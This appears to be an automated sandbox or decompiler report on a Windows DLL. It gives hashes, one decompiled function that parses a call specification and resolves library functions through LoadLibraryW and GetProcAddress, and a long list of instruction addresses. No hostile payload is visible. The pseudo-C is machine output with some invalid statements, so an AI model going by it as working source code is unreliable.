                                                • Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                                • Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E73541BFF() {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				WCHAR* _v24;
                                                				WCHAR* _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				WCHAR* _v48;
                                                				signed int _v52;
                                                				void* _v56;
                                                				intOrPtr _v60;
                                                				WCHAR* _t208;
                                                				signed int _t211;
                                                				void* _t213;
                                                				void* _t215;
                                                				WCHAR* _t217;
                                                				void* _t225;
                                                				struct HINSTANCE__* _t226;
                                                				struct HINSTANCE__* _t227;
                                                				struct HINSTANCE__* _t229;
                                                				signed short _t231;
                                                				struct HINSTANCE__* _t234;
                                                				struct HINSTANCE__* _t236;
                                                				void* _t237;
                                                				intOrPtr* _t238;
                                                				void* _t249;
                                                				signed char _t250;
                                                				signed int _t251;
                                                				void* _t255;
                                                				struct HINSTANCE__* _t257;
                                                				void* _t258;
                                                				signed int _t260;
                                                				signed int _t261;
                                                				signed short* _t264;
                                                				signed int _t269;
                                                				signed int _t272;
                                                				signed int _t274;
                                                				void* _t277;
                                                				void* _t281;
                                                				struct HINSTANCE__* _t283;
                                                				signed int _t286;
                                                				void _t287;
                                                				signed int _t288;
                                                				signed int _t300;
                                                				signed int _t301;
                                                				signed short _t304;
                                                				void* _t305;
                                                				signed int _t309;
                                                				signed int _t312;
                                                				signed int _t315;
                                                				signed int _t316;
                                                				signed int _t317;
                                                				signed short* _t321;
                                                				WCHAR* _t322;
                                                				WCHAR* _t324;
                                                				WCHAR* _t325;
                                                				struct HINSTANCE__* _t326;
                                                				void* _t328;
                                                				signed int _t331;
                                                				void* _t332;
                                                
                                                				_t283 = 0;
                                                				_v32 = 0;
                                                				_v36 = 0;
                                                				_v16 = 0;
                                                				_v8 = 0;
                                                				_v40 = 0;
                                                				_t332 = 0;
                                                				_v52 = 0;
                                                				_v44 = 0;
                                                				_t208 = E735412BB();
                                                				_v24 = _t208;
                                                				_v28 = _t208;
                                                				_v48 = E735412BB();
                                                				_t321 = E735412E3();
                                                				_v56 = _t321;
                                                				_v12 = _t321;
                                                				while(1) {
                                                					_t211 = _v32;
                                                					_v60 = _t211;
                                                					if(_t211 != _t283 && _t332 == _t283) {
                                                						break;
                                                					}
                                                					_t286 =  *_t321 & 0x0000ffff;
                                                					_t213 = _t286 - _t283;
                                                					if(_t213 == 0) {
                                                						_t37 =  &_v32;
                                                						 *_t37 = _v32 | 0xffffffff;
                                                						__eflags =  *_t37;
                                                						L20:
                                                						_t215 = _v60 - _t283;
                                                						if(_t215 == 0) {
                                                							__eflags = _t332 - _t283;
                                                							 *_v28 = _t283;
                                                							if(_t332 == _t283) {
                                                								_t255 = GlobalAlloc(0x40, 0x1ca4); // executed
                                                								_t332 = _t255;
                                                								 *(_t332 + 0x1010) = _t283;
                                                								 *(_t332 + 0x1014) = _t283;
                                                							}
                                                							_t287 = _v36;
                                                							_t47 = _t332 + 8; // 0x8
                                                							_t217 = _t47;
                                                							_t48 = _t332 + 0x808; // 0x808
                                                							_t322 = _t48;
                                                							 *_t332 = _t287;
                                                							_t288 = _t287 - _t283;
                                                							__eflags = _t288;
                                                							 *_t217 = _t283;
                                                							 *_t322 = _t283;
                                                							 *(_t332 + 0x1008) = _t283;
                                                							 *(_t332 + 0x100c) = _t283;
                                                							 *(_t332 + 4) = _t283;
                                                							if(_t288 == 0) {
                                                								__eflags = _v28 - _v24;
                                                								if(_v28 == _v24) {
                                                									goto L42;
                                                								}
                                                								_t328 = 0;
                                                								GlobalFree(_t332);
                                                								_t332 = E735413B1(_v24);
                                                								__eflags = _t332 - _t283;
                                                								if(_t332 == _t283) {
                                                									goto L42;
                                                								} else {
                                                									goto L35;
                                                								}
                                                								while(1) {
                                                									L35:
                                                									_t249 =  *(_t332 + 0x1ca0);
                                                									__eflags = _t249 - _t283;
                                                									if(_t249 == _t283) {
                                                										break;
                                                									}
                                                									_t328 = _t332;
                                                									_t332 = _t249;
                                                									__eflags = _t332 - _t283;
                                                									if(_t332 != _t283) {
                                                										continue;
                                                									}
                                                									break;
                                                								}
                                                								__eflags = _t328 - _t283;
                                                								if(_t328 != _t283) {
                                                									 *(_t328 + 0x1ca0) = _t283;
                                                								}
                                                								_t250 =  *(_t332 + 0x1010);
                                                								__eflags = _t250 & 0x00000008;
                                                								if((_t250 & 0x00000008) == 0) {
                                                									_t251 = _t250 | 0x00000002;
                                                									__eflags = _t251;
                                                									 *(_t332 + 0x1010) = _t251;
                                                								} else {
                                                									_t332 = E7354162F(_t332);
                                                									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
                                                								}
                                                								goto L42;
                                                							} else {
                                                								_t300 = _t288 - 1;
                                                								__eflags = _t300;
                                                								if(_t300 == 0) {
                                                									L31:
                                                									lstrcpyW(_t217, _v48);
                                                									L32:
                                                									lstrcpyW(_t322, _v24);
                                                									goto L42;
                                                								}
                                                								_t301 = _t300 - 1;
                                                								__eflags = _t301;
                                                								if(_t301 == 0) {
                                                									goto L32;
                                                								}
                                                								__eflags = _t301 != 1;
                                                								if(_t301 != 1) {
                                                									goto L42;
                                                								}
                                                								goto L31;
                                                							}
                                                						} else {
                                                							if(_t215 == 1) {
                                                								_t257 = _v16;
                                                								if(_v40 == _t283) {
                                                									_t257 = _t257 - 1;
                                                								}
                                                								 *(_t332 + 0x1014) = _t257;
                                                							}
                                                							L42:
                                                							_v12 = _v12 + 2;
                                                							_v28 = _v24;
                                                							L59:
                                                							if(_v32 != 0xffffffff) {
                                                								_t321 = _v12;
                                                								continue;
                                                							}
                                                							break;
                                                						}
                                                					}
                                                					_t258 = _t213 - 0x23;
                                                					if(_t258 == 0) {
                                                						__eflags = _t321 - _v56;
                                                						if(_t321 <= _v56) {
                                                							L17:
                                                							__eflags = _v44 - _t283;
                                                							if(_v44 != _t283) {
                                                								L43:
                                                								_t260 = _v32 - _t283;
                                                								__eflags = _t260;
                                                								if(_t260 == 0) {
                                                									_t261 = _t286;
                                                									while(1) {
                                                										__eflags = _t261 - 0x22;
                                                										if(_t261 != 0x22) {
                                                											break;
                                                										}
                                                										_t321 =  &(_t321[1]);
                                                										__eflags = _v44 - _t283;
                                                										_v12 = _t321;
                                                										if(_v44 == _t283) {
                                                											_v44 = 1;
                                                											L162:
                                                											_v28 =  &(_v28[0]);
                                                											 *_v28 =  *_t321;
                                                											L58:
                                                											_t331 =  &(_t321[1]);
                                                											__eflags = _t331;
                                                											_v12 = _t331;
                                                											goto L59;
                                                										}
                                                										_t261 =  *_t321 & 0x0000ffff;
                                                										_v44 = _t283;
                                                									}
                                                									__eflags = _t261 - 0x2a;
                                                									if(_t261 == 0x2a) {
                                                										_v36 = 2;
                                                										L57:
                                                										_t321 = _v12;
                                                										_v28 = _v24;
                                                										_t283 = 0;
                                                										__eflags = 0;
                                                										goto L58;
                                                									}
                                                									__eflags = _t261 - 0x2d;
                                                									if(_t261 == 0x2d) {
                                                										L151:
                                                										_t304 =  *_t321;
                                                										__eflags = _t304 - 0x2d;
                                                										if(_t304 != 0x2d) {
                                                											L154:
                                                											_t264 =  &(_t321[1]);
                                                											__eflags =  *_t264 - 0x3a;
                                                											if( *_t264 != 0x3a) {
                                                												goto L162;
                                                											}
                                                											__eflags = _t304 - 0x2d;
                                                											if(_t304 == 0x2d) {
                                                												goto L162;
                                                											}
                                                											_v36 = 1;
                                                											L157:
                                                											_v12 = _t264;
                                                											__eflags = _v28 - _v24;
                                                											if(_v28 <= _v24) {
                                                												 *_v48 = _t283;
                                                											} else {
                                                												 *_v28 = _t283;
                                                												lstrcpyW(_v48, _v24);
                                                											}
                                                											goto L57;
                                                										}
                                                										_t264 =  &(_t321[1]);
                                                										__eflags =  *_t264 - 0x3e;
                                                										if( *_t264 != 0x3e) {
                                                											goto L154;
                                                										}
                                                										_v36 = 3;
                                                										goto L157;
                                                									}
                                                									__eflags = _t261 - 0x3a;
                                                									if(_t261 != 0x3a) {
                                                										goto L162;
                                                									}
                                                									goto L151;
                                                								}
                                                								_t269 = _t260 - 1;
                                                								__eflags = _t269;
                                                								if(_t269 == 0) {
                                                									L80:
                                                									_t305 = _t286 + 0xffffffde;
                                                									__eflags = _t305 - 0x55;
                                                									if(_t305 > 0x55) {
                                                										goto L57;
                                                									}
                                                									switch( *((intOrPtr*)(( *(_t305 + 0x735423e8) & 0x000000ff) * 4 +  &M7354235C))) {
                                                										case 0:
                                                											__ecx = _v24;
                                                											__edi = _v12;
                                                											while(1) {
                                                												__edi = __edi + 1;
                                                												__edi = __edi + 1;
                                                												_v12 = __edi;
                                                												__ax =  *__edi;
                                                												__eflags = __ax - __dx;
                                                												if(__ax != __dx) {
                                                													goto L132;
                                                												}
                                                												L131:
                                                												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                												if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                													L136:
                                                													 *__ecx =  *__ecx & 0x00000000;
                                                													__eax = E735412CC(_v24);
                                                													__ebx = __eax;
                                                													goto L97;
                                                												}
                                                												L132:
                                                												__eflags = __ax;
                                                												if(__ax == 0) {
                                                													goto L136;
                                                												}
                                                												__eflags = __ax - __dx;
                                                												if(__ax == __dx) {
                                                													__edi = __edi + 1;
                                                													__edi = __edi + 1;
                                                													__eflags = __edi;
                                                												}
                                                												__ax =  *__edi;
                                                												 *__ecx =  *__edi;
                                                												__ecx = __ecx + 1;
                                                												__ecx = __ecx + 1;
                                                												__edi = __edi + 1;
                                                												__edi = __edi + 1;
                                                												_v12 = __edi;
                                                												__ax =  *__edi;
                                                												__eflags = __ax - __dx;
                                                												if(__ax != __dx) {
                                                													goto L132;
                                                												}
                                                												goto L131;
                                                											}
                                                										case 1:
                                                											_v8 = 1;
                                                											goto L57;
                                                										case 2:
                                                											_v8 = _v8 | 0xffffffff;
                                                											goto L57;
                                                										case 3:
                                                											_v8 = _v8 & 0x00000000;
                                                											_v20 = _v20 & 0x00000000;
                                                											_v16 = _v16 + 1;
                                                											goto L85;
                                                										case 4:
                                                											__eflags = _v20;
                                                											if(_v20 != 0) {
                                                												goto L57;
                                                											}
                                                											_v12 = _v12 - 2;
                                                											__ebx = E735412BB();
                                                											 &_v12 = E73541B86( &_v12);
                                                											__eax = E73541510(__edx, __eax, __edx, __ebx);
                                                											goto L97;
                                                										case 5:
                                                											L105:
                                                											_v20 = _v20 + 1;
                                                											goto L57;
                                                										case 6:
                                                											_push(7);
                                                											goto L123;
                                                										case 7:
                                                											_push(0x19);
                                                											goto L143;
                                                										case 8:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L107;
                                                										case 9:
                                                											_push(0x15);
                                                											goto L143;
                                                										case 0xa:
                                                											_push(0x16);
                                                											goto L143;
                                                										case 0xb:
                                                											_push(0x18);
                                                											goto L143;
                                                										case 0xc:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L118;
                                                										case 0xd:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L109;
                                                										case 0xe:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L111;
                                                										case 0xf:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L122;
                                                										case 0x10:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L113;
                                                										case 0x11:
                                                											_push(3);
                                                											goto L123;
                                                										case 0x12:
                                                											_push(0x17);
                                                											L143:
                                                											_pop(__ebx);
                                                											goto L98;
                                                										case 0x13:
                                                											__eax =  &_v12;
                                                											__eax = E73541B86( &_v12);
                                                											__ebx = __eax;
                                                											__ebx = __eax + 1;
                                                											__eflags = __ebx - 0xb;
                                                											if(__ebx < 0xb) {
                                                												__ebx = __ebx + 0xa;
                                                											}
                                                											goto L97;
                                                										case 0x14:
                                                											__ebx = 0xffffffff;
                                                											goto L98;
                                                										case 0x15:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L116;
                                                										case 0x16:
                                                											__ecx = 0;
                                                											__eflags = 0;
                                                											goto L91;
                                                										case 0x17:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L120;
                                                										case 0x18:
                                                											_t271 =  *(_t332 + 0x1014);
                                                											__eflags = _t271 - _v16;
                                                											if(_t271 > _v16) {
                                                												_v16 = _t271;
                                                											}
                                                											_v8 = _v8 & 0x00000000;
                                                											_v20 = _v20 & 0x00000000;
                                                											_v36 - 3 = _t271 - (_v36 == 3);
                                                											if(_t271 != _v36 == 3) {
                                                												L85:
                                                												_v40 = 1;
                                                											}
                                                											goto L57;
                                                										case 0x19:
                                                											L107:
                                                											__ecx = 0;
                                                											_v8 = 2;
                                                											__ecx = 1;
                                                											goto L91;
                                                										case 0x1a:
                                                											L118:
                                                											_push(5);
                                                											goto L123;
                                                										case 0x1b:
                                                											L109:
                                                											__ecx = 0;
                                                											_v8 = 3;
                                                											__ecx = 1;
                                                											goto L91;
                                                										case 0x1c:
                                                											L111:
                                                											__ecx = 0;
                                                											__ecx = 1;
                                                											goto L91;
                                                										case 0x1d:
                                                											L122:
                                                											_push(6);
                                                											goto L123;
                                                										case 0x1e:
                                                											L113:
                                                											_push(2);
                                                											goto L123;
                                                										case 0x1f:
                                                											__eax =  &_v12;
                                                											__eax = E73541B86( &_v12);
                                                											__ebx = __eax;
                                                											__ebx = __eax + 1;
                                                											goto L97;
                                                										case 0x20:
                                                											L116:
                                                											_v52 = _v52 + 1;
                                                											_push(4);
                                                											_pop(__ecx);
                                                											goto L91;
                                                										case 0x21:
                                                											L120:
                                                											_push(4);
                                                											L123:
                                                											_pop(__ecx);
                                                											L91:
                                                											__edi = _v16;
                                                											__edx =  *(0x7354405c + __ecx * 4);
                                                											__eax =  ~__eax;
                                                											asm("sbb eax, eax");
                                                											_v40 = 1;
                                                											__edi = _v16 << 5;
                                                											__eax = __eax & 0x00008000;
                                                											__edi = (_v16 << 5) + __esi;
                                                											__eax = __eax | __ecx;
                                                											__eflags = _v8;
                                                											 *(__edi + 0x1018) = __eax;
                                                											if(_v8 < 0) {
                                                												L93:
                                                												__edx = 0;
                                                												__edx = 1;
                                                												__eflags = 1;
                                                												L94:
                                                												__eflags = _v8 - 1;
                                                												 *(__edi + 0x1028) = __edx;
                                                												if(_v8 == 1) {
                                                													__eax =  &_v12;
                                                													__eax = E73541B86( &_v12);
                                                													__eax = __eax + 1;
                                                													__eflags = __eax;
                                                													_v8 = __eax;
                                                												}
                                                												__eax = _v8;
                                                												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                                												_t136 = _v16 + 0x81; // 0x81
                                                												_t136 = _t136 << 5;
                                                												__eax = 0;
                                                												__eflags = 0;
                                                												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                                                												 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                                												 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                                												L97:
                                                												__eflags = __ebx;
                                                												if(__ebx == 0) {
                                                													goto L57;
                                                												}
                                                												L98:
                                                												__eflags = _v20;
                                                												_v40 = 1;
                                                												if(_v20 != 0) {
                                                													L103:
                                                													__eflags = _v20 - 1;
                                                													if(_v20 == 1) {
                                                														__eax = _v16;
                                                														__eax = _v16 << 5;
                                                														__eflags = __eax;
                                                														 *(__eax + __esi + 0x102c) = __ebx;
                                                													}
                                                													goto L105;
                                                												}
                                                												_v16 = _v16 << 5;
                                                												_t144 = __esi + 0x1030; // 0x1030
                                                												__edi = (_v16 << 5) + _t144;
                                                												__eax =  *__edi;
                                                												__eflags = __eax - 0xffffffff;
                                                												if(__eax <= 0xffffffff) {
                                                													L101:
                                                													__eax = GlobalFree(__eax);
                                                													L102:
                                                													 *__edi = __ebx;
                                                													goto L103;
                                                												}
                                                												__eflags = __eax - 0x19;
                                                												if(__eax <= 0x19) {
                                                													goto L102;
                                                												}
                                                												goto L101;
                                                											}
                                                											__eflags = __edx;
                                                											if(__edx > 0) {
                                                												goto L94;
                                                											}
                                                											goto L93;
                                                										case 0x22:
                                                											goto L57;
                                                									}
                                                								}
                                                								_t272 = _t269 - 1;
                                                								__eflags = _t272;
                                                								if(_t272 == 0) {
                                                									_v16 = _t283;
                                                									goto L80;
                                                								}
                                                								__eflags = _t272 != 1;
                                                								if(_t272 != 1) {
                                                									goto L162;
                                                								}
                                                								__eflags = _t286 - 0x6e;
                                                								if(__eflags > 0) {
                                                									_t309 = _t286 - 0x72;
                                                									__eflags = _t309;
                                                									if(_t309 == 0) {
                                                										_push(4);
                                                										L74:
                                                										_pop(_t274);
                                                										L75:
                                                										__eflags = _v8 - 1;
                                                										if(_v8 != 1) {
                                                											_t96 = _t332 + 0x1010;
                                                											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
                                                											__eflags =  *_t96;
                                                										} else {
                                                											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
                                                										}
                                                										_v8 = 1;
                                                										goto L57;
                                                									}
                                                									_t312 = _t309 - 1;
                                                									__eflags = _t312;
                                                									if(_t312 == 0) {
                                                										_push(0x10);
                                                										goto L74;
                                                									}
                                                									__eflags = _t312 != 0;
                                                									if(_t312 != 0) {
                                                										goto L57;
                                                									}
                                                									_push(0x40);
                                                									goto L74;
                                                								}
                                                								if(__eflags == 0) {
                                                									_push(8);
                                                									goto L74;
                                                								}
                                                								_t315 = _t286 - 0x21;
                                                								__eflags = _t315;
                                                								if(_t315 == 0) {
                                                									_v8 =  ~_v8;
                                                									goto L57;
                                                								}
                                                								_t316 = _t315 - 0x11;
                                                								__eflags = _t316;
                                                								if(_t316 == 0) {
                                                									_t274 = 0x100;
                                                									goto L75;
                                                								}
                                                								_t317 = _t316 - 0x31;
                                                								__eflags = _t317;
                                                								if(_t317 == 0) {
                                                									_t274 = 1;
                                                									goto L75;
                                                								}
                                                								__eflags = _t317 != 0;
                                                								if(_t317 != 0) {
                                                									goto L57;
                                                								}
                                                								_push(0x20);
                                                								goto L74;
                                                							} else {
                                                								_v32 = _t283;
                                                								_v36 = _t283;
                                                								goto L20;
                                                							}
                                                						}
                                                						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
                                                						if( *((short*)(_t321 - 2)) != 0x3a) {
                                                							goto L17;
                                                						}
                                                						__eflags = _v32 - _t283;
                                                						if(_v32 == _t283) {
                                                							goto L43;
                                                						}
                                                						goto L17;
                                                					}
                                                					_t277 = _t258 - 5;
                                                					if(_t277 == 0) {
                                                						__eflags = _v44 - _t283;
                                                						if(_v44 != _t283) {
                                                							goto L43;
                                                						} else {
                                                							__eflags = _v36 - 3;
                                                							_v32 = 1;
                                                							_v8 = _t283;
                                                							_v20 = _t283;
                                                							_v16 = (0 | _v36 == 0x00000003) + 1;
                                                							_v40 = _t283;
                                                							goto L20;
                                                						}
                                                					}
                                                					_t281 = _t277 - 1;
                                                					if(_t281 == 0) {
                                                						__eflags = _v44 - _t283;
                                                						if(_v44 != _t283) {
                                                							goto L43;
                                                						} else {
                                                							_v32 = 2;
                                                							_v8 = _t283;
                                                							_v20 = _t283;
                                                							goto L20;
                                                						}
                                                					}
                                                					if(_t281 != 0x16) {
                                                						goto L43;
                                                					} else {
                                                						_v32 = 3;
                                                						_v8 = 1;
                                                						goto L20;
                                                					}
                                                				}
                                                				GlobalFree(_v56);
                                                				GlobalFree(_v24);
                                                				GlobalFree(_v48);
                                                				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
                                                					L182:
                                                					return _t332;
                                                				} else {
                                                					_t225 =  *_t332 - 1;
                                                					if(_t225 == 0) {
                                                						_t187 = _t332 + 8; // 0x8
                                                						_t324 = _t187;
                                                						__eflags =  *_t324 - _t283;
                                                						if( *_t324 != _t283) {
                                                							_t226 = GetModuleHandleW(_t324);
                                                							__eflags = _t226 - _t283;
                                                							 *(_t332 + 0x1008) = _t226;
                                                							if(_t226 != _t283) {
                                                								L171:
                                                								_t192 = _t332 + 0x808; // 0x808
                                                								_t325 = _t192;
                                                								_t227 = E735416BD( *(_t332 + 0x1008), _t325);
                                                								__eflags = _t227 - _t283;
                                                								 *(_t332 + 0x100c) = _t227;
                                                								if(_t227 == _t283) {
                                                									__eflags =  *_t325 - 0x23;
                                                									if( *_t325 == 0x23) {
                                                										_t195 = _t332 + 0x80a; // 0x80a
                                                										_t231 = E735413B1(_t195);
                                                										__eflags = _t231 - _t283;
                                                										if(_t231 != _t283) {
                                                											__eflags = _t231 & 0xffff0000;
                                                											if((_t231 & 0xffff0000) == 0) {
                                                												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
                                                											}
                                                										}
                                                									}
                                                								}
                                                								__eflags = _v52 - _t283;
                                                								if(_v52 != _t283) {
                                                									L178:
                                                									_t325[lstrlenW(_t325)] = 0x57;
                                                									_t229 = E735416BD( *(_t332 + 0x1008), _t325);
                                                									__eflags = _t229 - _t283;
                                                									if(_t229 != _t283) {
                                                										L166:
                                                										 *(_t332 + 0x100c) = _t229;
                                                										goto L182;
                                                									}
                                                									__eflags =  *(_t332 + 0x100c) - _t283;
                                                									L180:
                                                									if(__eflags != 0) {
                                                										goto L182;
                                                									}
                                                									L181:
                                                									_t206 = _t332 + 4;
                                                									 *_t206 =  *(_t332 + 4) | 0xffffffff;
                                                									__eflags =  *_t206;
                                                									goto L182;
                                                								} else {
                                                									__eflags =  *(_t332 + 0x100c) - _t283;
                                                									if( *(_t332 + 0x100c) != _t283) {
                                                										goto L182;
                                                									}
                                                									goto L178;
                                                								}
                                                							}
                                                							_t234 = LoadLibraryW(_t324); // executed
                                                							__eflags = _t234 - _t283;
                                                							 *(_t332 + 0x1008) = _t234;
                                                							if(_t234 == _t283) {
                                                								goto L181;
                                                							}
                                                							goto L171;
                                                						}
                                                						_t188 = _t332 + 0x808; // 0x808
                                                						_t236 = E735413B1(_t188);
                                                						 *(_t332 + 0x100c) = _t236;
                                                						__eflags = _t236 - _t283;
                                                						goto L180;
                                                					}
                                                					_t237 = _t225 - 1;
                                                					if(_t237 == 0) {
                                                						_t185 = _t332 + 0x808; // 0x808
                                                						_t238 = _t185;
                                                						__eflags =  *_t238 - _t283;
                                                						if( *_t238 == _t283) {
                                                							goto L182;
                                                						}
                                                						_t229 = E735413B1(_t238);
                                                						L165:
                                                						goto L166;
                                                					}
                                                					if(_t237 != 1) {
                                                						goto L182;
                                                					}
                                                					_t81 = _t332 + 8; // 0x8
                                                					_t284 = _t81;
                                                					_t326 = E735413B1(_t81);
                                                					 *(_t332 + 0x1008) = _t326;
                                                					if(_t326 == 0) {
                                                						goto L181;
                                                					}
                                                					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
                                                					 *((intOrPtr*)(_t332 + 0x1050)) = E735412CC(_t284);
                                                					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
                                                					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
                                                					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
                                                					_t90 = _t332 + 0x808; // 0x808
                                                					_t229 =  *(_t326->i + E735413B1(_t90) * 4);
                                                					goto L165;
                                                				}
                                                			}


































































                                                0x73541c07
                                                0x73541c0a
                                                0x73541c0d
                                                0x73541c10
                                                0x73541c13
                                                0x73541c16
                                                0x73541c19
                                                0x73541c1b
                                                0x73541c1e
                                                0x73541c21
                                                0x73541c26
                                                0x73541c29
                                                0x73541c31
                                                0x73541c39
                                                0x73541c3b
                                                0x73541c3e
                                                0x73541c46
                                                0x73541c46
                                                0x73541c4b
                                                0x73541c4e
                                                0x00000000
                                                0x00000000
                                                0x73541c5b
                                                0x73541c60
                                                0x73541c62
                                                0x73541cf4
                                                0x73541cf4
                                                0x73541cf4
                                                0x73541cf8
                                                0x73541cfb
                                                0x73541cfd
                                                0x73541d1f
                                                0x73541d21
                                                0x73541d24
                                                0x73541d2d
                                                0x73541d33
                                                0x73541d35
                                                0x73541d3b
                                                0x73541d3b
                                                0x73541d41
                                                0x73541d44
                                                0x73541d44
                                                0x73541d47
                                                0x73541d47
                                                0x73541d4d
                                                0x73541d4f
                                                0x73541d4f
                                                0x73541d51
                                                0x73541d54
                                                0x73541d57
                                                0x73541d5d
                                                0x73541d63
                                                0x73541d66
                                                0x73541d8a
                                                0x73541d8d
                                                0x00000000
                                                0x00000000
                                                0x73541d90
                                                0x73541d92
                                                0x73541da0
                                                0x73541da3
                                                0x73541da5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73541da7
                                                0x73541da7
                                                0x73541da7
                                                0x73541dad
                                                0x73541daf
                                                0x00000000
                                                0x00000000
                                                0x73541db1
                                                0x73541db3
                                                0x73541db5
                                                0x73541db7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73541db7
                                                0x73541db9
                                                0x73541dbb
                                                0x73541dbd
                                                0x73541dbd
                                                0x73541dc3
                                                0x73541dc9
                                                0x73541dcb
                                                0x73541ddf
                                                0x73541ddf
                                                0x73541de1
                                                0x73541dcd
                                                0x73541dd3
                                                0x73541dd6
                                                0x73541dd6
                                                0x00000000
                                                0x73541d68
                                                0x73541d68
                                                0x73541d68
                                                0x73541d69
                                                0x73541d71
                                                0x73541d75
                                                0x73541d7b
                                                0x73541d7f
                                                0x00000000
                                                0x73541d7f
                                                0x73541d6b
                                                0x73541d6b
                                                0x73541d6c
                                                0x00000000
                                                0x00000000
                                                0x73541d6e
                                                0x73541d6f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73541d6f
                                                0x73541cff
                                                0x73541d00
                                                0x73541d09
                                                0x73541d0c
                                                0x73541d19
                                                0x73541d19
                                                0x73541d0e
                                                0x73541d0e
                                                0x73541de7
                                                0x73541dea
                                                0x73541dee
                                                0x73541e61
                                                0x73541e65
                                                0x73541c43
                                                0x00000000
                                                0x73541c43
                                                0x00000000
                                                0x73541e65
                                                0x73541cfd
                                                0x73541c68
                                                0x73541c6b
                                                0x73541cce
                                                0x73541cd1
                                                0x73541ce3
                                                0x73541ce3
                                                0x73541ce6
                                                0x73541df3
                                                0x73541df6
                                                0x73541df6
                                                0x73541df8
                                                0x735421ae
                                                0x735421c6
                                                0x735421c6
                                                0x735421c9
                                                0x00000000
                                                0x00000000
                                                0x735421b3
                                                0x735421b4
                                                0x735421b7
                                                0x735421ba
                                                0x73542244
                                                0x7354224b
                                                0x73542251
                                                0x73542255
                                                0x73541e5c
                                                0x73541e5d
                                                0x73541e5d
                                                0x73541e5e
                                                0x00000000
                                                0x73541e5e
                                                0x735421c0
                                                0x735421c3
                                                0x735421c3
                                                0x735421cb
                                                0x735421ce
                                                0x73542238
                                                0x73541e51
                                                0x73541e54
                                                0x73541e57
                                                0x73541e5a
                                                0x73541e5a
                                                0x00000000
                                                0x73541e5a
                                                0x735421d0
                                                0x735421d3
                                                0x735421da
                                                0x735421da
                                                0x735421dd
                                                0x735421e1
                                                0x735421f5
                                                0x735421f5
                                                0x735421f8
                                                0x735421fc
                                                0x00000000
                                                0x00000000
                                                0x735421fe
                                                0x73542202
                                                0x00000000
                                                0x00000000
                                                0x73542204
                                                0x7354220b
                                                0x7354220b
                                                0x73542211
                                                0x73542214
                                                0x73542230
                                                0x73542216
                                                0x7354221f
                                                0x73542222
                                                0x73542222
                                                0x00000000
                                                0x73542214
                                                0x735421e3
                                                0x735421e6
                                                0x735421ea
                                                0x00000000
                                                0x00000000
                                                0x735421ec
                                                0x00000000
                                                0x735421ec
                                                0x735421d5
                                                0x735421d8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x735421d8
                                                0x73541dfe
                                                0x73541dfe
                                                0x73541dff
                                                0x73541f49
                                                0x73541f49
                                                0x73541f50
                                                0x73541f53
                                                0x00000000
                                                0x00000000
                                                0x73541f60
                                                0x00000000
                                                0x7354214b
                                                0x7354214e
                                                0x73542151
                                                0x73542151
                                                0x73542152
                                                0x73542153
                                                0x73542156
                                                0x73542159
                                                0x7354215c
                                                0x00000000
                                                0x00000000
                                                0x7354215e
                                                0x7354215e
                                                0x73542162
                                                0x7354217a
                                                0x7354217d
                                                0x73542181
                                                0x73542187
                                                0x00000000
                                                0x73542187
                                                0x73542164
                                                0x73542164
                                                0x73542167
                                                0x00000000
                                                0x00000000
                                                0x73542169
                                                0x7354216c
                                                0x7354216e
                                                0x7354216f
                                                0x7354216f
                                                0x7354216f
                                                0x73542170
                                                0x73542173
                                                0x73542176
                                                0x73542177
                                                0x73542151
                                                0x73542152
                                                0x73542153
                                                0x73542156
                                                0x73542159
                                                0x7354215c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x7354215c
                                                0x00000000
                                                0x73541fa7
                                                0x00000000
                                                0x00000000
                                                0x73541fb3
                                                0x00000000
                                                0x00000000
                                                0x73541f9a
                                                0x73541f9e
                                                0x73541fa2
                                                0x00000000
                                                0x00000000
                                                0x7354211c
                                                0x73542120
                                                0x00000000
                                                0x00000000
                                                0x73542126
                                                0x7354212f
                                                0x73542136
                                                0x7354213e
                                                0x00000000
                                                0x00000000
                                                0x73542083
                                                0x73542083
                                                0x00000000
